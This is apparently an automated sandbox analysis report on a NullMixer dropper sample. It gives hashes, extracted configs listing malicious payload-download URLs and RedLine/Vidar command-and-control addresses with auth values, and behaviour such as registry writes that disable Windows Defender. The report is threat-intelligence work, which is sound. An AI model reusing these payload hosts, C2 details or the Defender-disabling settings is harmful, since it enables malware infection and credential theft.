nullmixer | f552b32f88a9508a1b3141c1f6a4bcea3f06c7146c87718182b31ca2b3c42166

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-10-2022 16:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe
Size

5.4MB
MD5

769d7edd7924cc493c6b26dd96b68535
SHA1

140d8e6b072b8bcd1ebf5b67ff3d7bc7a69762cc
SHA256

f552b32f88a9508a1b3141c1f6a4bcea3f06c7146c87718182b31ca2b3c42166
SHA512

e2cf3966537ae60bfb429ffed0d7d18c25aabfaa2bea93069e9def64fcdfaba51e108af92d99cfe8944e244cfa1037249b9a6f1b5893dffe76b964f7e880ee62
SSDEEP

98304:JbDgw1rDdDMwLzEBsrUwgM5J9M3+tub5XQSh5L8ydVybapTjlJ6Fk:JQ+r5MaEBsrUw5Jq3+sbB1HLHjybapTh

Malware Config

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

redline

Botnet

media0321

91.121.67.60:23325

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

redline

Botnet

newjust

135.181.129.119:4805

Attributes

auth_value
b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

vidar

Version

47.8

Botnet

916

https://mas.to/@romashkin

Attributes

profile_id
916

Extracted

Family

redline

Botnet

6.4

103.89.90.61:34589

Attributes

auth_value
a7a3522462b1f9687c4ead2995816370

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

51.89.201.21:7161

Attributes

auth_value
3a050df92d0cf082b2cdaf87863616be

Signatures

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1868-282-0x0000000000920000-0x0000000000929000-memory.dmp	family_smokeloader

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Wed01f7e5b93d9.exeWed012ad6331600ed.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Wed01f7e5b93d9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Wed012ad6331600ed.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Wed012ad6331600ed.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Wed01f7e5b93d9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Wed01f7e5b93d9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Wed01f7e5b93d9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Wed01f7e5b93d9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Wed01f7e5b93d9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Wed01f7e5b93d9.exe

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7952	4700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6288	4700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	43900	4700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	43020	4700	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1248-269-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1248-267-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/1456-271-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/1456-273-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5736-389-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral2/memory/5100-396-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed0127b0d6b4cf.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed0127b0d6b4cf.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5016-295-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger
behavioral2/memory/5016-291-0x0000000000590000-0x00000000005DC000-memory.dmp	family_onlylogger
behavioral2/memory/5016-323-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2176-279-0x0000000002620000-0x00000000026F6000-memory.dmp	family_vidar
behavioral2/memory/2176-280-0x0000000000400000-0x0000000000959000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\libcurlpp.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 24 IoCs

Processes:

setup_installer.exesetup_install.exeWed01f7e5b93d9.exeWed011abd65cf6e.exeWed010bd23656.exeWed01a11f81d09577.exeWerFault.exeWed01d85f2899987.exeWed010dc6015ee.exeWed011301c1f8269d.exeWed016bd188413.exeWed0127b0d6b4cf.exeWed010dc6015ee.tmpWed01cb8783ed376.exeWed012ad6331600ed.exeWed016bd188413.tmpWed016c01e4e1de9.exeWed01f0f622732865b.exeWed016bd188413.exeWed01d85f2899987.exeWed016bd188413.tmpWed01a11f81d09577.exeWed011301c1f8269d.exed8sm.EXE

pid	process
4296	setup_installer.exe
3172	setup_install.exe
792	Wed01f7e5b93d9.exe
2176	Wed011abd65cf6e.exe
2584	Wed010bd23656.exe
3948	Wed01a11f81d09577.exe
2216	WerFault.exe
2668	Wed01d85f2899987.exe
1884	Wed010dc6015ee.exe
4200	Wed011301c1f8269d.exe
4204	Wed016bd188413.exe
4520	Wed0127b0d6b4cf.exe
1320	Wed010dc6015ee.tmp
5016	Wed01cb8783ed376.exe
5056	Wed012ad6331600ed.exe
4516	Wed016bd188413.tmp
4852	Wed016c01e4e1de9.exe
1868	Wed01f0f622732865b.exe
2684	Wed016bd188413.exe
3540	Wed01d85f2899987.exe
2236	Wed016bd188413.tmp
1248	Wed01a11f81d09577.exe
1456	Wed011301c1f8269d.exe
4692	d8sm.EXE

Modifies Windows Firewall 1 TTPs 5 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

6752 netsh.exe
6424 netsh.exe
8640 netsh.exe
8012 netsh.exe
13628 netsh.exe

pid	process
6752	netsh.exe
6424	netsh.exe
8640	netsh.exe
8012	netsh.exe
13628	netsh.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/952-369-0x0000000140000000-0x0000000140623000-memory.dmp	vmprotect
behavioral2/memory/5228-380-0x0000000140000000-0x0000000140623000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup_installer.exeWed016bd188413.tmpmshta.exeWed01f7e5b93d9.exeWed012ad6331600ed.exeF552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exemshta.exed8sm.EXEmshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Wed016bd188413.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Wed01f7e5b93d9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Wed012ad6331600ed.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	d8sm.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 10 IoCs

Processes:

setup_install.exeWed010dc6015ee.tmpWed016bd188413.tmpWed016bd188413.tmpmsiexec.exe

pid	process
3172	setup_install.exe
3172	setup_install.exe
3172	setup_install.exe
3172	setup_install.exe
3172	setup_install.exe
3172	setup_install.exe
1320	Wed010dc6015ee.tmp
4516	Wed016bd188413.tmp
2236	Wed016bd188413.tmp
1948	msiexec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

80 ipinfo.io
319 ipinfo.io
321 ipinfo.io
324 ipinfo.io
346 ipinfo.io
347 ipinfo.io
57 ipinfo.io
58 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
80	ipinfo.io
319	ipinfo.io
321	ipinfo.io
324	ipinfo.io
346	ipinfo.io
347	ipinfo.io
57	ipinfo.io
58	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

Processes:

Wed01a11f81d09577.exeWed011301c1f8269d.exe

description	pid	process	target process
PID 3948 set thread context of 1248	3948	Wed01a11f81d09577.exe	Wed01a11f81d09577.exe
PID 4200 set thread context of 1456	4200	Wed011301c1f8269d.exe	Wed011301c1f8269d.exe

Drops file in Program Files directory 3 IoCs

Processes:

Wed016bd188413.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Wed016bd188413.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-LHL7O.tmp	Wed016bd188413.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Wed016bd188413.tmp

Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6804 sc.exe
4184 sc.exe
8216 sc.exe
8884 sc.exe
10340 sc.exe
11196 sc.exe
6428 sc.exe
2276 sc.exe
6420 sc.exe
4520 sc.exe
9208 sc.exe
2820 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
6804	sc.exe
4184	sc.exe
8216	sc.exe
8884	sc.exe
10340	sc.exe
11196	sc.exe
6428	sc.exe
2276	sc.exe
6420	sc.exe
4520	sc.exe
9208	sc.exe
2820	sc.exe

Program crash 44 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2936	5016	WerFault.exe	Wed01cb8783ed376.exe
2612	2176	WerFault.exe	Wed011abd65cf6e.exe
2752	5016	WerFault.exe	Wed01cb8783ed376.exe
1364	5016	WerFault.exe	Wed01cb8783ed376.exe
628	5016	WerFault.exe	Wed01cb8783ed376.exe
2736	5016	WerFault.exe	Wed01cb8783ed376.exe
2668	5016	WerFault.exe	Wed01cb8783ed376.exe
2400	5016	WerFault.exe	Wed01cb8783ed376.exe
4504	5016	WerFault.exe	Wed01cb8783ed376.exe
860	5016	WerFault.exe	Wed01cb8783ed376.exe
7116	3816	WerFault.exe	xxxlzx_Kue9u1Zg1ICKD6IfE.exe
6984	4948	WerFault.exe	GfLDOZkhElGvgVVjmIsy5R_b.exe
1212	8008	WerFault.exe	rundll32.exe
8932	6844	WerFault.exe	kwftsoxc.exe
9460	3104	WerFault.exe	jzbofxi.exe
10036	9360	WerFault.exe	rundll32.exe
12496	3848	WerFault.exe	LgKFYka76axHmcXZrZ8vDUR9.exe
12740	652	WerFault.exe	jcwe_ojsL_Cyl6l26gSUddle.exe
13892	8844	WerFault.exe	yewlqja.exe
35192	33796	WerFault.exe	CgfqwZEoJ5h1knIUHVcPDDNT.exe
34712	2484	WerFault.exe	VmoDXFzu9xcqkeSH4OJNMU7j.exe
41368	40468	WerFault.exe	GcleanerEU.exe
41448	40752	WerFault.exe	gcleaner.exe
41792	35512	WerFault.exe	GcleanerEU.exe
42004	8940	WerFault.exe	gcleaner.exe
42340	40468	WerFault.exe	GcleanerEU.exe
42508	40752	WerFault.exe	gcleaner.exe
42972	35512	WerFault.exe	GcleanerEU.exe
3400	8940	WerFault.exe	gcleaner.exe
41684	40752	WerFault.exe	gcleaner.exe
4812	40468	WerFault.exe	GcleanerEU.exe
43312	35512	WerFault.exe	GcleanerEU.exe
43724	8940	WerFault.exe	gcleaner.exe
44004	40468	WerFault.exe	GcleanerEU.exe
43988	40752	WerFault.exe	gcleaner.exe
40232	43928	WerFault.exe	rundll32.exe
41232	35512	WerFault.exe	GcleanerEU.exe
7908	8940	WerFault.exe	gcleaner.exe
41296	40468	WerFault.exe	GcleanerEU.exe
43988	40752	WerFault.exe	gcleaner.exe
44348	35512	WerFault.exe	GcleanerEU.exe
44760	8940	WerFault.exe	gcleaner.exe
44792	40468	WerFault.exe	GcleanerEU.exe
43020	40752	WerFault.exe	gcleaner.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Wed01f0f622732865b.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01f0f622732865b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01f0f622732865b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed01f0f622732865b.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

7440 schtasks.exe
7864 schtasks.exe
7920 schtasks.exe
4008 schtasks.exe
38900 schtasks.exe
43092 schtasks.exe
43900 schtasks.exe
7448 schtasks.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2092 taskkill.exe
3888 taskkill.exe
38420 taskkill.exe
41060 taskkill.exe

pid	process
7440	schtasks.exe
7864	schtasks.exe
7920	schtasks.exe
4008	schtasks.exe
38900	schtasks.exe
43092	schtasks.exe
43900	schtasks.exe
7448	schtasks.exe

pid	process
2092	taskkill.exe
3888	taskkill.exe
38420	taskkill.exe
41060	taskkill.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	318	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	334	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	656	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	658	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeWed01f0f622732865b.exe

pid	process
3584	powershell.exe
3584	powershell.exe
3692	powershell.exe
3692	powershell.exe
3584	powershell.exe
3692	powershell.exe
1868	Wed01f0f622732865b.exe
1868	Wed01f0f622732865b.exe
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Wed01f0f622732865b.exe

pid process

1868 Wed01f0f622732865b.exe

pid	process
1868	Wed01f0f622732865b.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Wed0127b0d6b4cf.exepowershell.exepowershell.exeWed016c01e4e1de9.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeAssignPrimaryTokenPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeLockMemoryPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeIncreaseQuotaPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeMachineAccountPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeTcbPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeSecurityPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeTakeOwnershipPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeLoadDriverPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeSystemProfilePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeSystemtimePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeProfSingleProcessPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeIncBasePriorityPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeCreatePagefilePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeCreatePermanentPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeBackupPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeRestorePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeShutdownPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeDebugPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeAuditPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeSystemEnvironmentPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeChangeNotifyPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeRemoteShutdownPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeUndockPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeSyncAgentPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeEnableDelegationPrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeManageVolumePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeImpersonatePrivilege	4520	Wed0127b0d6b4cf.exe
Token: SeCreateGlobalPrivilege	4520	Wed0127b0d6b4cf.exe
Token: 31	4520	Wed0127b0d6b4cf.exe
Token: 32	4520	Wed0127b0d6b4cf.exe
Token: 33	4520	Wed0127b0d6b4cf.exe
Token: 34	4520	Wed0127b0d6b4cf.exe
Token: 35	4520	Wed0127b0d6b4cf.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	4852	Wed016c01e4e1de9.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Wed016bd188413.tmp

pid process

2236 Wed016bd188413.tmp

pid	process
2236	Wed016bd188413.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4852 wrote to memory of 4296	4852	F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe	setup_installer.exe
PID 4852 wrote to memory of 4296	4852	F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe	setup_installer.exe
PID 4852 wrote to memory of 4296	4852	F552B32F88A9508A1B3141C1F6A4BCEA3F06C7146C877.exe	setup_installer.exe
PID 4296 wrote to memory of 3172	4296	setup_installer.exe	setup_install.exe
PID 4296 wrote to memory of 3172	4296	setup_installer.exe	setup_install.exe
PID 4296 wrote to memory of 3172	4296	setup_installer.exe	setup_install.exe
PID 3172 wrote to memory of 3876	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3876	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3876	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1964	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1964	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 1964	3172	setup_install.exe	cmd.exe
PID 1964 wrote to memory of 3692	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 3692	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 3692	1964	cmd.exe	powershell.exe
PID 3876 wrote to memory of 3584	3876	cmd.exe	powershell.exe
PID 3876 wrote to memory of 3584	3876	cmd.exe	powershell.exe
PID 3876 wrote to memory of 3584	3876	cmd.exe	powershell.exe
PID 3172 wrote to memory of 3352	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3352	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3352	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3336	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3336	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3336	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3660	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3660	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3660	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 2520	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 2520	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 2520	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3840	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3840	3172	setup_install.exe	cmd.exe
PID 3172 wrote to memory of 3840	3172	setup_install.exe	cmd.exe
PID 3336 wrote to memory of 792	3336	cmd.exe	Wed01f7e5b93d9.exe
PID 3336 wrote to memory of 792	3336	cmd.exe	Wed01f7e5b93d9.exe
